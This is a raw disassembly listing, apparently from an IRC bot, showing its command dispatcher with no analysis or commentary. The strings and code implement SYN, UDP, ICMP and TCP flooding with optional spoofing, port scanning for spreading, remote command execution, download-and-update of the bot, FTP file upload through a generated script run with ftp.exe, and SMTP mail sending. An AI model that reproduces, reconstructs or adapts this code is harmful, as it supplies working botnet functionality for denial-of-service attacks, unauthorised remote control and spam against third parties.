mov eax, [ebp+esi+var_8C]
cmp eax, ebx
mov [ebp+arg_18], eax
jz loc_40FAB8
push [ebp+arg_8]
push offset aIrc_addalias ; "irc.addalias"
call sub_4177D0
pop ecx
test eax, eax
pop ecx
jz loc_413C52
push [ebp+arg_8]
push offset aIrc_aa ; "irc.aa"
call sub_4177D0
pop ecx
test eax, eax
pop ecx
jz loc_413C52
push [ebp+arg_8]
push offset aIrc_privmsg ; "irc.privmsg"
call sub_4177D0
pop ecx
test eax, eax
pop ecx
jz loc_413BFF
push [ebp+arg_8]
push offset aIrc_pm ; "irc.pm"
call sub_4177D0
pop ecx
test eax, eax
pop ecx
jz loc_413BFF
push [ebp+arg_8]
push offset aIrc_action ; "irc.action"
call sub_4177D0
pop ecx
test eax, eax
pop ecx
jz loc_413B91
push [ebp+arg_8]
push offset aIrc_ac ; "irc.ac"
call sub_4177D0
pop ecx
test eax, eax
pop ecx
jz loc_413B91
push [ebp+arg_8]
push offset aIrc_cycle ; "irc.cycle"
call sub_4177D0
pop ecx
test eax, eax
pop ecx
jz loc_413B2E
push [ebp+arg_8]
push offset aIrc_cy ; "irc.cy"
call sub_4177D0
pop ecx
test eax, eax
pop ecx
jz loc_413B2E
push [ebp+arg_8]
push offset aIrc_mode ; "irc.mode"
call sub_4177D0
pop ecx
test eax, eax
pop ecx
jz loc_413AEF
push [ebp+arg_8]
push offset aIrc_m ; "irc.m"
call sub_4177D0
pop ecx
test eax, eax
pop ecx
jz loc_413AEF
push [ebp+arg_8]
push offset aClone_raw ; "clone.raw"
call sub_4177D0
pop ecx
test eax, eax
pop ecx
jz loc_413A84
push [ebp+arg_8]
push offset aClone_ra ; "clone.ra"
call sub_4177D0
pop ecx
test eax, eax
pop ecx
jz loc_413A84
push [ebp+arg_8]
push offset aClone_mode ; "clone.mode"
call sub_4177D0
pop ecx
test eax, eax
pop ecx
jz loc_413A02
push [ebp+arg_8]
push offset aClone_m ; "clone.m"
call sub_4177D0
pop ecx
test eax, eax
pop ecx
jz loc_413A02
push [ebp+arg_8]
push offset aClone_nick ; "clone.nick"
call sub_4177D0
pop ecx
test eax, eax
pop ecx
jz loc_413991
push [ebp+arg_8]
push offset aClone_ni ; "clone.ni"
call sub_4177D0
pop ecx
test eax, eax
pop ecx
jz loc_413991
push [ebp+arg_8]
push offset aClone_join ; "clone.join"
call sub_4177D0
pop ecx
test eax, eax
pop ecx
jz loc_41396B
push [ebp+arg_8]
push offset aClone_j ; "clone.j"
call sub_4177D0
pop ecx
test eax, eax
pop ecx
jz loc_41396B
push [ebp+arg_8]
push offset aClone_part ; "clone.part"
call sub_4177D0
pop ecx
test eax, eax
pop ecx
jz loc_413908
push [ebp+arg_8]
push offset aClone_p ; "clone.p"
call sub_4177D0
pop ecx
test eax, eax
pop ecx
jz loc_413908
push [ebp+arg_8]
push offset aIrc_repeat ; "irc.repeat"
call sub_4177D0
pop ecx
test eax, eax
pop ecx
jz loc_413842
push [ebp+arg_8]
push offset aIrc_rp ; "irc.rp"
call sub_4177D0
pop ecx
test eax, eax
pop ecx
jz loc_413842
push [ebp+arg_8]
push offset aIrc_delay ; "irc.delay"
call sub_4177D0
pop ecx
test eax, eax
pop ecx
jz loc_4137A7
push [ebp+arg_8]
push offset aIrc_de ; "irc.de"
call sub_4177D0
pop ecx
test eax, eax
pop ecx
jz loc_4137A7
push [ebp+arg_8]
push offset aDownload_updat ; "download.updat4m13"
call sub_4177D0
pop ecx
test eax, eax
pop ecx
jz loc_413626
push [ebp+arg_8]
push offset aDownload_up33 ; "download.up33"
call sub_4177D0
pop ecx
test eax, eax
pop ecx
jz loc_413626
push [ebp+arg_8]
push offset aCom_execute ; "com.execute"
call sub_4177D0
pop ecx
test eax, eax
pop ecx
jz loc_413593
push [ebp+arg_8]
push offset aCom_e ; "com.e"
call sub_4177D0
pop ecx
test eax, eax
pop ecx
jz loc_413593
push [ebp+arg_8]
push offset aFindfile ; "findfile"
call sub_4177D0
pop ecx
test eax, eax
pop ecx
jz loc_413495
push [ebp+arg_8]
push offset aFf ; "ff"
call sub_4177D0
pop ecx
test eax, eax
pop ecx
jz loc_413495
push [ebp+arg_8]
push offset aCom_rename ; "com.rename"
call sub_4177D0
pop ecx
test eax, eax
pop ecx
jz loc_413441
push [ebp+arg_8]
push offset aCom_mv ; "com.mv"
call sub_4177D0
pop ecx
test eax, eax
pop ecx
jz loc_413441
push [ebp+arg_8]
push offset aDdos_icmp ; "ddos.icmp"
call sub_4177D0
pop ecx
test eax, eax
pop ecx
jz loc_413346
push [ebp+arg_8]
push offset aDdos_ic ; "ddos.ic"
call sub_4177D0
pop ecx
test eax, eax
pop ecx
jz loc_413346
mov eax, [ebp+esi+var_88]
cmp eax, ebx
mov [ebp+arg_0], eax
jz loc_40FAB8
push [ebp+arg_8]
push offset aClone_make ; "clone.make"
call sub_4177D0
pop ecx
test eax, eax
pop ecx
jz loc_41325B
push [ebp+arg_8]
push offset aClone_start ; "clone.start"
call sub_4177D0
pop ecx
test eax, eax
pop ecx
jz loc_41325B
push [ebp+arg_8]
push offset aDdos_syn ; "ddos.syn"
call sub_4177D0
pop ecx
test eax, eax
pop ecx
jz loc_413162
push [ebp+arg_8]
push offset aDdos_ack ; "ddos.ack"
call sub_4177D0
pop ecx
test eax, eax
pop ecx
jz loc_413162
push [ebp+arg_8]
push offset aDdos_random ; "ddos.random"
call sub_4177D0
pop ecx
test eax, eax
pop ecx
jz loc_413162
push [ebp+arg_8]
push offset aDdos_synflood ; "ddos.synflood"
call sub_4177D0
pop ecx
test eax, eax
pop ecx
jz loc_41307A
push [ebp+arg_8]
push offset aDdos_synf ; "ddos.synf"
call sub_4177D0
pop ecx
test eax, eax
pop ecx
jz loc_41307A
push [ebp+arg_8]
push offset aDownload_wgett ; "download.wgett4m13"
call sub_4177D0
pop ecx
test eax, eax
pop ecx
jz loc_412F3C
push [ebp+arg_8]
push offset aDownload_wg33 ; "download.wg33"
call sub_4177D0
pop ecx
test eax, eax
pop ecx
jz loc_412F3C
push [ebp+arg_8]
push offset aDaemon_redirec ; "daemon.redirect"
call sub_4177D0
pop ecx
test eax, eax
pop ecx
jz loc_412E2C
push [ebp+arg_8]
push offset aDaemon_rd ; "daemon.rd"
call sub_4177D0
pop ecx
test eax, eax
pop ecx
jz loc_412E2C
push [ebp+arg_8]
push offset aRoot_portscan ; "root.portscan"
call sub_4177D0
pop ecx
test eax, eax
pop ecx
jz loc_412D39
push [ebp+arg_8]
push offset aRoot_ps ; "root.ps"
call sub_4177D0
pop ecx
test eax, eax
pop ecx
jz loc_412D39
push [ebp+arg_8]
push offset aClone_privmsg ; "clone.privmsg"
call sub_4177D0
pop ecx
test eax, eax
pop ecx
jz loc_412C64
push [ebp+arg_8]
push offset aClone_pm ; "clone.pm"
call sub_4177D0
pop ecx
test eax, eax
pop ecx
jz loc_412C64
push [ebp+arg_8]
push offset aClone_action ; "clone.action"
call sub_4177D0
pop ecx
test eax, eax
pop ecx
jz loc_412B52
push [ebp+arg_8]
push offset aClone_ac ; "clone.ac"
call sub_4177D0
pop ecx
test eax, eax
pop ecx
jz loc_412B52
mov eax, [ebp+esi+var_84]
cmp eax, ebx
mov [ebp+arg_10], eax
jz loc_40FAB8
push [ebp+arg_8]
push offset aRoot_start ; "root.start"
call sub_4177D0
pop ecx
test eax, eax
pop ecx
jz loc_4127F3
push [ebp+arg_8]
push offset aRoot_s ; "root.s"
call sub_4177D0
pop ecx
test eax, eax
pop ecx
jz loc_4127F3
push [ebp+arg_8]
push offset aDdos_udpflood ; "ddos.udpflood"
call sub_4177D0
pop ecx
test eax, eax
pop ecx
jz loc_4126AD
push [ebp+arg_8]
push offset aDdos_udpf ; "ddos.udpf"
call sub_4177D0
pop ecx
test eax, eax
pop ecx
jz loc_4126AD
push [ebp+arg_8]
push offset aU ; "u"
call sub_4177D0
pop ecx
test eax, eax
pop ecx
jz loc_4126AD
push [ebp+arg_8]
push offset aDdos_pingflood ; "ddos.pingflood"
call sub_4177D0
pop ecx
test eax, eax
pop ecx
jz loc_412586
push [ebp+arg_8]
push offset aDdos_pingf ; "ddos.pingf"
call sub_4177D0
pop ecx
test eax, eax
pop ecx
jz loc_412586
push [ebp+arg_8]
push offset aP ; "p"
call sub_4177D0
pop ecx
test eax, eax
pop ecx
jz loc_412586
push [ebp+arg_8]
push offset aDdos_tcpflood ; "ddos.tcpflood"
call sub_4177D0
pop ecx
test eax, eax
pop ecx
jz loc_4123E5
push [ebp+arg_8]
push offset aDdos_tcpf ; "ddos.tcpf"
call sub_4177D0
pop ecx
test eax, eax
pop ecx
jz loc_4123E5
push [ebp+arg_8]
push offset aUtil_email ; "util.email"
call sub_4177D0
pop ecx
test eax, eax
pop ecx
jnz loc_4121F3
lea eax, [ebp+var_3F8]
push edi
push eax
call sub_417A00
push [ebp+arg_18]
call sub_41791F
push [ebp+arg_0]
mov [ebp+arg_18], eax
lea eax, [ebp+var_DB0]
push eax
call sub_417A00
push [ebp+arg_10]
lea eax, [ebp+var_BA8]
push eax
call sub_417A00
push offset asc_428300 ; " "
push offset a__0 ; "_"
push [ebp+esi+var_80]
call sub_40A74C
push eax
lea eax, [ebp+var_55C]
push eax
call sub_417A00
add esp, 30h
lea eax, [ebp+var_6EC]
push eax
push 101h
call dword_441330 ; WSAStartup
lea eax, [ebp+var_3F8]
push eax
call dword_44143C ; gethostbyname
push 6
push 1
push 2
mov edi, eax
call dword_441438 ; socket
push [ebp+arg_18]
mov esi, eax
mov [ebp+var_2EC], 2
mov eax, [edi+0Ch]
mov eax, [eax]
mov eax, [eax]
mov [ebp+var_2E8], eax
call dword_4413B8 ; ntohs
mov [ebp+var_2EA], ax
lea eax, [ebp+var_55C]
push eax
lea eax, [ebp+var_DB0]
push eax
lea eax, [ebp+var_55C]
push eax
lea eax, [ebp+var_BA8]
push eax
lea eax, [ebp+var_DB0]
push eax
lea eax, [ebp+var_15B0]
push offset aHeloRndnickMai ; "helo $rndnick\nmail from: <%s>\nrcpt to: "...
push eax
call sub_4173AC
add esp, 1Ch
lea eax, [ebp+var_2EC]
push 10h
push eax
push esi
call dword_441360 ; connect
mov edi, 100h
push ebx
lea eax, [ebp+var_CAC]
push edi
push eax
push esi
call dword_4413D0 ; recv
lea eax, [ebp+var_CAC]
push ebx
push eax
call sub_417AF0
pop ecx
push eax
lea eax, [ebp+var_15B0]
push eax
push esi
call dword_441408 ; send
push ebx
lea eax, [ebp+var_CAC]
push edi
push eax
push esi
call dword_4413D0 ; recv
push esi
call dword_441450 ; closesocket
call dword_441318 ; WSACleanup
lea eax, [ebp+var_BA8]
push eax
push offset unk_436E60
loc_4121DF: ; CODE XREF: sub_40F6F1+3C50�j
; sub_40F6F1+3F30�j ...
lea eax, [ebp+var_2DC]
push eax
call sub_4173AC
add esp, 0Ch
jmp loc_41455C
; ---------------------------------------------------------------------------
loc_4121F3: ; CODE XREF: sub_40F6F1+2998�j
push [ebp+arg_8]
push offset aUtil_httpcon ; "util.httpcon"
call sub_4177D0
pop ecx
test eax, eax
pop ecx
jz loc_4123B4
push [ebp+arg_8]
push offset aUtil_hcon ; "util.hcon"
call sub_4177D0
pop ecx
test eax, eax
pop ecx
jz loc_4123B4
mov esi, [ebp+esi+var_80]
cmp esi, ebx
jz loc_40FAB8
push [ebp+arg_8]
push offset aFtp_upload ; "ftp.upload"
call sub_4177D0
pop ecx
test eax, eax
pop ecx
jnz loc_415956
push 4
push esi
call sub_40D5A0
pop ecx
test eax, eax
pop ecx
jnz short loc_412289
push esi
push offset dword_436E08
loc_412258: ; CODE XREF: sub_40F6F1+2E78�j
; sub_40F6F1+2F9C�j ...
lea eax, [ebp+var_2DC]
push eax
call sub_4173AC
loc_412264: ; CODE XREF: sub_40F6F1+2FB7�j
add esp, 0Ch
loc_412267: ; CODE XREF: sub_40F6F1+2E5C�j
; sub_40F6F1+2E90�j ...
cmp [ebp+var_8], ebx
jnz loc_4157D0
push ebx
lea eax, [ebp+var_2DC]
push [ebp+var_4]
push eax
push [ebp+var_8C]
push [ebp+arg_4]
jmp loc_414FD6
; ---------------------------------------------------------------------------
loc_412289: ; CODE XREF: sub_40F6F1+2B5F�j
nop
call near ptr 7C80929Ch
push eax
call sub_4173FE
pop ecx
call sub_417408
push 9
cdq
pop ecx
idiv ecx
push edx
call sub_417408
push 63h
cdq
pop ecx
idiv ecx
push edx
call sub_417408
cdq
mov ecx, 3E7h
idiv ecx
lea eax, [ebp+var_CB0]
push edx
push eax
lea eax, [ebp+var_BAC]
push offset aSIII_dll ; "%s\\%i%i%i.dll"
push eax
call sub_4173AC
lea eax, [ebp+var_BAC]
push offset aAb ; "ab"
push eax
call sub_41823A
add esp, 20h
cmp eax, ebx
mov [ebp+arg_24], eax
jz loc_40FAB8
push esi
push [ebp+arg_10]
push [ebp+arg_0]
push [ebp+arg_18]
push edi
push offset aOpenSSSSPutSBy ; "open %s\r\n%s\r\n%s\r\n%s\r\nput %s\r\nbye\r\n"
push eax
call sub_419096
push [ebp+arg_24]
call sub_4180DC
lea eax, [ebp+var_BAC]
push eax
lea eax, [ebp+var_3F8]
push offset aSS_4 ; "-s:%s"
push eax
call sub_4173AC
add esp, 2Ch
lea eax, [ebp+var_3F8]
push ebx
push ebx
push eax
push offset aFtp_exe ; "ftp.exe"
push offset aOpen ; "open"
push ebx
call dword_44132C ; ShellExecuteA
test eax, eax
push edi
push esi
jz short loc_412353
push offset dword_436D8C
jmp short loc_412358
; ---------------------------------------------------------------------------
loc_412353: ; CODE XREF: sub_40F6F1+2C59�j
push offset dword_436D50
loc_412358: ; CODE XREF: sub_40F6F1+2C60�j
call sub_4173AC
add esp, 0Ch
cmp [ebp+var_8], ebx
jnz short loc_412381
push ebx
lea eax, [ebp+var_2DC]
push [ebp+var_4]
push eax
push [ebp+var_8C]
push [ebp+arg_4]
call sub_40DC10
add esp, 14h
loc_412381: ; CODE XREF: sub_40F6F1+2C72�j
lea eax, [ebp+var_2DC]
push eax
call sub_40C4F7
loc_41238D: ; CODE XREF: sub_40F6F1+2CC1�j
lea eax, [ebp+var_BAC]
push 4
push eax
call sub_40D5A0
add esp, 0Ch
test eax, eax
jz loc_40FAB8
lea eax, [ebp+var_BAC]
push eax
call sub_41906C
jmp short loc_41238D
; ---------------------------------------------------------------------------
loc_4123B4: ; CODE XREF: sub_40F6F1+2B13�j
; sub_40F6F1+2B2A�j
push [ebp+esi+var_80]
push [ebp+arg_10]
push [ebp+arg_0]
push [ebp+arg_18]
call sub_41791F
pop ecx
push eax
push edi
push [ebp+var_8]
push [ebp+var_4]
push [ebp+var_8C]
push [ebp+arg_4]
call sub_406A64
add esp, 24h
jmp loc_415956
; ---------------------------------------------------------------------------
loc_4123E5: ; CODE XREF: sub_40F6F1+296A�j
; sub_40F6F1+2981�j
mov esi, 80h
push edi
lea eax, [ebp+var_678]
push esi
push eax
call sub_41792A
lea eax, [ebp+var_678]
push eax
push offset aSyn ; "syn"
call sub_4177D0
add esp, 14h
test eax, eax
jz short loc_412448
lea eax, [ebp+var_678]
push eax
push offset aAck ; "ack"
call sub_4177D0
pop ecx
test eax, eax
pop ecx
jz short loc_412448
lea eax, [ebp+var_678]
push eax
push offset aRandom ; "random"
call sub_4177D0
pop ecx
test eax, eax
pop ecx
jz short loc_412448
push offset dword_436D18
jmp loc_412573
; ---------------------------------------------------------------------------
loc_412448: ; CODE XREF: sub_40F6F1+2D1D�j
; sub_40F6F1+2D34�j ...
push [ebp+arg_10]
call sub_41791F
cmp eax, ebx
pop ecx
mov [ebp+var_570], eax
jle loc_41256E
push edi
lea eax, [ebp+var_678]
push esi
push eax
call sub_41792A
push [ebp+arg_18]
lea eax, [ebp+var_6F8]
push esi
push eax
call sub_41792A
push [ebp+arg_0]
call sub_41791F
mov [ebp+var_574], eax
xor eax, eax
cmp [ebp+var_9B6], bl
push [ebp+var_8C]
setnz al
mov [ebp+var_56C], eax
mov eax, [ebp+arg_4]
mov [ebp+var_6FC], eax
lea eax, [ebp+var_5F8]
push esi
push eax
call sub_41792A
mov eax, [ebp+var_4]
add esp, 28h
cmp [ebp+var_56C], ebx
mov [ebp+var_568], eax
mov eax, [ebp+var_8]
mov [ebp+var_564], eax
mov eax, offset aSpoofed ; "Spoofed"
jnz short loc_4124DF
mov eax, offset aNormal ; "Normal"
loc_4124DF: ; CODE XREF: sub_40F6F1+2DE7�j
push [ebp+arg_10]
push [ebp+arg_0]
push [ebp+arg_18]
push edi
push eax
push offset dword_436CC4
lea eax, [ebp+var_2DC]
push 200h
push eax
call sub_41792A
push ebx
lea eax, [ebp+var_2DC]
push 0Ch
push eax
call sub_416E58
add esp, 2Ch
mov [ebp+var_578], eax
lea eax, [ebp+var_10]
push eax
lea eax, [ebp+var_6FC]
push ebx
push eax
push offset sub_401D79
push ebx
push ebx
nop
call near ptr 7C810637h
mov ecx, [ebp+var_578]
imul ecx, 234h
cmp eax, ebx
mov dword_446E24[ecx], eax
jz short loc_41255D
loc_412547: ; CODE XREF: sub_40F6F1+2E6A�j
cmp [ebp+var_560], ebx
jnz loc_412267
push 32h
nop
call near ptr 7C802442h
jmp short loc_412547
; ---------------------------------------------------------------------------
loc_41255D: ; CODE XREF: sub_40F6F1+2E54�j
nop
call near ptr 7C910331h
push eax
push offset dword_436C7C
jmp loc_412258
; ---------------------------------------------------------------------------
loc_41256E: ; CODE XREF: sub_40F6F1+2D68�j
push offset dword_436C34
loc_412573: ; CODE XREF: sub_40F6F1+2D52�j
; sub_40F6F1+3220�j ...
lea eax, [ebp+var_2DC]
push eax
call sub_4173AC
pop ecx
pop ecx
jmp loc_412267
; ---------------------------------------------------------------------------
loc_412586: ; CODE XREF: sub_40F6F1+2925�j
; sub_40F6F1+293C�j ...
cmp dword_4414A8, ebx
jnz loc_412692
mov eax, [ebp+var_8]
push 7Fh
mov [ebp+var_300], eax
mov eax, [ebp+var_4]
mov [ebp+var_304], eax
lea eax, [ebp+var_398]
push edi
push eax
call sub_4182F0
push [ebp+arg_18]
call sub_41791F
push [ebp+arg_0]
mov [ebp+var_318], eax
call sub_41791F
push [ebp+arg_10]
mov [ebp+var_314], eax
call sub_41791F
push 7Fh
mov [ebp+var_310], eax
push [ebp+var_8C]
lea eax, [ebp+var_418]
push eax
call sub_4182F0
push [ebp+var_310]
mov eax, [ebp+arg_4]
mov [ebp+var_41C], eax
lea eax, [ebp+var_398]
push [ebp+var_314]
push eax
lea eax, [ebp+var_2DC]
push [ebp+var_318]
push offset unk_436BDC
push eax
call sub_4173AC
push ebx
lea eax, [ebp+var_2DC]
push 0Eh
push eax
call sub_416E58
add esp, 48h
mov [ebp+var_308], eax
lea eax, [ebp+var_10]
push eax
lea eax, [ebp+var_41C]
push ebx
push eax
push offset sub_40B45B
push ebx
push ebx
nop
call near ptr 7C810637h
mov ecx, [ebp+var_308]
imul ecx, 234h
cmp eax, ebx
mov dword_446E24[ecx], eax
jz short loc_412681
loc_41266B: ; CODE XREF: sub_40F6F1+2F8E�j
cmp [ebp+var_2FC], ebx
jnz loc_412267
push 32h
nop
call near ptr 7C802442h
jmp short loc_41266B
; ---------------------------------------------------------------------------
loc_412681: ; CODE XREF: sub_40F6F1+2F78�j
nop
call near ptr 7C910331h
push eax
push offset unk_436B94
jmp loc_412258
; ---------------------------------------------------------------------------
loc_412692: ; CODE XREF: sub_40F6F1+2E9B�j
push 1FFh
lea eax, [ebp+var_2DC]
push offset aIcmp_dllNotAva ; "ICMP.dll not available"
push eax
call sub_4182F0
jmp loc_412264
; ---------------------------------------------------------------------------
loc_4126AD: ; CODE XREF: sub_40F6F1+28E0�j
; sub_40F6F1+28F7�j ...
mov eax, [ebp+var_8]
push 7Fh
mov [ebp+var_300], eax
mov eax, [ebp+var_4]
mov [ebp+var_304], eax
lea eax, [ebp+var_398]
push edi
push eax
call sub_4182F0
push [ebp+arg_18]
call sub_41791F
push [ebp+arg_0]
mov [ebp+var_318], eax
call sub_41791F
push [ebp+arg_10]
mov [ebp+var_314], eax
call sub_41791F
mov esi, [ebp+esi+var_80]
add esp, 18h
cmp esi, ebx
mov [ebp+var_310], eax
jz short loc_412712
push esi
call sub_41791F
pop ecx
mov [ebp+var_30C], eax
jmp short loc_412718
; ---------------------------------------------------------------------------
loc_412712: ; CODE XREF: sub_40F6F1+3010�j
mov [ebp+var_30C], ebx
loc_412718: ; CODE XREF: sub_40F6F1+301F�j
push 7Fh
lea eax, [ebp+var_418]
push [ebp+var_8C]
push eax
call sub_4182F0
push [ebp+var_310]
mov esi, [ebp+arg_4]
lea eax, [ebp+var_398]
mov [ebp+var_41C], esi
push [ebp+var_314]
push eax
lea eax, [ebp+var_2DC]
push [ebp+var_318]
push offset dword_436B24
push eax
call sub_4173AC
push ebx
lea eax, [ebp+var_2DC]
push 0Fh
push eax
call sub_416E58
add esp, 30h
mov [ebp+var_308], eax
lea eax, [ebp+var_10]
push eax
lea eax, [ebp+var_41C]
push ebx
push eax
push offset sub_40B5E7
push ebx
push ebx
nop
call near ptr 7C810637h
mov ecx, [ebp+var_308]
imul ecx, 234h
cmp eax, ebx
mov dword_446E24[ecx], eax
jz short loc_4127B8
loc_4127A6: ; CODE XREF: sub_40F6F1+30C5�j
cmp [ebp+var_2FC], ebx
jnz short loc_4127D3
push 32h
nop
call near ptr 7C802442h
jmp short loc_4127A6
; ---------------------------------------------------------------------------
loc_4127B8: ; CODE XREF: sub_40F6F1+30B3�j
nop
call near ptr 7C910331h
push eax
push offset dword_436ADC
loc_4127C4: ; CODE XREF: sub_40F6F1+3984�j
; sub_40F6F1+3A6C�j ...
lea eax, [ebp+var_2DC]
push eax
call sub_4173AC
add esp, 0Ch
loc_4127D3: ; CODE XREF: sub_40F6F1+30BB�j
; sub_40F6F1+3968�j ...
cmp [ebp+var_8], ebx
jnz loc_4157D0
push ebx
push [ebp+var_4]
loc_4127E0: ; CODE XREF: sub_40F6F1+3846�j
lea eax, [ebp+var_2DC]
push eax
push [ebp+var_8C]
push esi
jmp loc_414FD6
; ---------------------------------------------------------------------------
loc_4127F3: ; CODE XREF: sub_40F6F1+28B2�j
; sub_40F6F1+28C9�j
push 8
call sub_4170A0
push [ebp+arg_18]
mov [ebp+arg_8], eax
call sub_41791F
add eax, [ebp+arg_8]
pop ecx
pop ecx
cmp eax, 3E8h
jle short loc_412846
push [ebp+arg_8]
lea eax, [ebp+var_2DC]
push offset unk_436A90
push eax
call sub_4173AC
push ebx
lea eax, [ebp+var_2DC]
push [ebp+var_4]
push eax
push [ebp+var_8C]
push [ebp+arg_4]
call sub_40DC10
loc_41283E: ; CODE XREF: sub_40F6F1+455C�j
add esp, 20h
jmp loc_415956
; ---------------------------------------------------------------------------
loc_412846: ; CODE XREF: sub_40F6F1+311E�j
push edi
call sub_41791F
push [ebp+arg_18]
mov [ebp+var_330], eax
call sub_41791F
push [ebp+arg_0]
mov [ebp+var_318], eax
call sub_41791F
add esp, 0Ch
cmp eax, 5
mov [ebp+var_32C], eax
jnb short loc_41287F
push 5
pop eax
mov [ebp+var_32C], eax
loc_41287F: ; CODE XREF: sub_40F6F1+3183�j
push 3Ch
pop ecx
cmp eax, ecx
jbe short loc_41288C
mov [ebp+var_32C], ecx
loc_41288C: ; CODE XREF: sub_40F6F1+3193�j
push [ebp+arg_10]
call sub_41791F
mov [ebp+var_328], eax
mov eax, 2710h
cmp [ebp+var_328], eax
pop ecx
jbe short loc_4128AE
mov [ebp+var_328], eax
loc_4128AE: ; CODE XREF: sub_40F6F1+31B5�j
or [ebp+var_314], 0FFFFFFFFh
cmp dword_428BF8, ebx
mov [ebp+arg_0], ebx
jz short loc_412904
mov [ebp+arg_24], offset dword_428BF8
loc_4128C7: ; CODE XREF: sub_40F6F1+31F5�j
mov eax, [ebp+arg_24]
push edi
add eax, 0FFFFFFD8h
push eax
call sub_4177D0
pop ecx
test eax, eax
pop ecx
jz short loc_4128EA
add [ebp+arg_24], 3Ch
inc [ebp+arg_0]
mov eax, [ebp+arg_24]
cmp [eax], ebx
jnz short loc_4128C7
jmp short loc_412904
; ---------------------------------------------------------------------------
loc_4128EA: ; CODE XREF: sub_40F6F1+31E7�j
mov eax, [ebp+arg_0]
mov ecx, eax
mov [ebp+var_314], eax
imul ecx, 3Ch
mov ecx, dword_428BF8[ecx]
mov [ebp+var_330], ecx
loc_412904: ; CODE XREF: sub_40F6F1+31CD�j
; sub_40F6F1+31F7�j
cmp [ebp+var_330], ebx
jnz short loc_412916
push offset unk_436A4C
jmp loc_412573
; ---------------------------------------------------------------------------
loc_412916: ; CODE XREF: sub_40F6F1+3219�j
mov edi, [ebp+esi+var_80]
cmp edi, ebx
mov [ebp+arg_18], edi
jz short loc_412951
cmp byte ptr [edi], 23h
jz short loc_412951
push edi
lea eax, [ebp+var_444]
push 10h
push eax
call sub_41792A
push 78h
push edi
call sub_418630
add esp, 14h
neg eax
sbb eax, eax
neg eax
mov [ebp+var_304], eax
jmp loc_412A25
; ---------------------------------------------------------------------------
loc_412951: ; CODE XREF: sub_40F6F1+322E�j
; sub_40F6F1+3233�j
cmp [ebp+var_9C7], bl
jnz short loc_412973
cmp [ebp+var_9C6], bl
jnz short loc_412973
cmp [ebp+var_9B6], bl
jnz short loc_412973
push offset unk_436A08
jmp loc_412573
; ---------------------------------------------------------------------------
loc_412973: ; CODE XREF: sub_40F6F1+3266�j
; sub_40F6F1+326E�j ...
push 10h
lea eax, [ebp+arg_0]
pop edi
push eax
lea eax, [ebp+var_2EC]
push eax
mov [ebp+arg_0], edi
push [ebp+arg_4]
call dword_44135C ; getsockname
mov al, [ebp+var_9C7]
push edi
neg al
sbb eax, eax
and ax, 100h
add eax, 0FFFFh
and [ebp+var_2E8], eax
push [ebp+var_2E8]
call dword_441444 ; inet_ntoa
push eax
lea eax, [ebp+var_444]
push eax
call sub_4182F0
add esp, 0Ch
cmp [ebp+var_9B6], bl
jz short loc_412A1F
xor eax, eax
cmp [ebp+var_9C7], bl
push 30h
setnz al
inc eax
inc eax
mov edi, eax
lea eax, [ebp+var_444]
push eax
call sub_4185F0
pop ecx
cmp edi, ebx
pop ecx
mov byte ptr [ebp+arg_24+3], bl
jle short loc_412A13
loc_4129F1: ; CODE XREF: sub_40F6F1+3320�j
cmp eax, ebx
jz short loc_412A13
mov byte ptr [eax], 78h
lea eax, [ebp+var_444]
push 30h
push eax
call sub_4185F0
inc byte ptr [ebp+arg_24+3]
pop ecx
pop ecx
movsx ecx, byte ptr [ebp+arg_24+3]
cmp ecx, edi
jl short loc_4129F1
loc_412A13: ; CODE XREF: sub_40F6F1+32FE�j
; sub_40F6F1+3302�j
mov [ebp+var_304], 1
jmp short loc_412A25
; ---------------------------------------------------------------------------
loc_412A1F: ; CODE XREF: sub_40F6F1+32D8�j
mov [ebp+var_304], ebx
loc_412A25: ; CODE XREF: sub_40F6F1+325B�j
; sub_40F6F1+332C�j
mov eax, [ebp+arg_4]
push [ebp+var_8C]
mov [ebp+var_334], eax
mov eax, [ebp+var_4]
mov [ebp+var_30C], eax
mov eax, [ebp+var_8]
mov [ebp+var_308], eax
mov edi, 80h
lea eax, [ebp+var_434]
push edi
push eax
call sub_41792A
mov esi, [ebp+esi+var_7C]
add esp, 0Ch
cmp esi, ebx
jz short loc_412A76
loc_412A63: ; CODE XREF: sub_40F6F1+33A8�j
push esi
loc_412A64: ; CODE XREF: sub_40F6F1+3392�j
lea eax, [ebp+var_3B4]
push edi
push eax
call sub_41792A
add esp, 0Ch
jmp short loc_412AA1
; ---------------------------------------------------------------------------
loc_412A76: ; CODE XREF: sub_40F6F1+3370�j
mov eax, [ebp+arg_18]
cmp eax, ebx
jz short loc_412A85
cmp byte ptr [eax], 23h
jnz short loc_412A85
push eax
jmp short loc_412A64
; ---------------------------------------------------------------------------
loc_412A85: ; CODE XREF: sub_40F6F1+338A�j
; sub_40F6F1+338F�j
mov esi, offset aSodoma_3e ; "##sodoma_3e"
push offset byte_43C63C
push esi
call sub_4177D0
pop ecx
test eax, eax
pop ecx
jnz short loc_412A63
mov [ebp+var_3B4], bl
loc_412AA1: ; CODE XREF: sub_40F6F1+3383�j
cmp [ebp+var_304], ebx
mov eax, offset aRandom_0 ; "Random"
jnz short loc_412AB3
mov eax, offset aSequential ; "Sequential"
loc_412AB3: ; CODE XREF: sub_40F6F1+33BB�j
push [ebp+var_318]
lea ecx, [ebp+var_444]
push [ebp+var_328]
push [ebp+var_32C]
push [ebp+var_330]
push ecx
push eax
lea eax, [ebp+var_2DC]
push offset unk_436984
push eax
call sub_4173AC
push ebx
lea eax, [ebp+var_2DC]
push 8
push eax
call sub_416E58
add esp, 2Ch
mov [ebp+var_324], eax
lea eax, [ebp+var_10]
push eax
lea eax, [ebp+var_444]
push ebx
push eax
push offset sub_4078E6
push ebx
push ebx
nop
call near ptr 7C810637h
mov ecx, [ebp+var_324]
imul ecx, 234h
cmp eax, ebx
mov dword_446E24[ecx], eax
jz short loc_412B41
loc_412B2B: ; CODE XREF: sub_40F6F1+344E�j
cmp [ebp+var_300], ebx
jnz loc_412267
push 32h
nop
call near ptr 7C802442h
jmp short loc_412B2B
; ---------------------------------------------------------------------------
loc_412B41: ; CODE XREF: sub_40F6F1+3438�j
nop
call near ptr 7C910331h
push eax
push offset unk_43693C
jmp loc_412258
; ---------------------------------------------------------------------------
loc_412B52: ; CODE XREF: sub_40F6F1+2872�j
; sub_40F6F1+2889�j
push edi
call sub_41791F
imul eax, 234h
pop ecx
cmp byte_446E28[eax], bl
jz loc_415956
cmp [ebp+var_C], ebx
jz loc_415956
push edi
call sub_417AF0
push [ebp+arg_8]
mov esi, eax
call sub_417AF0
push [ebp+arg_18]
add esi, eax
call sub_417AF0
add eax, [ebp+var_C]
push [ebp+arg_0]
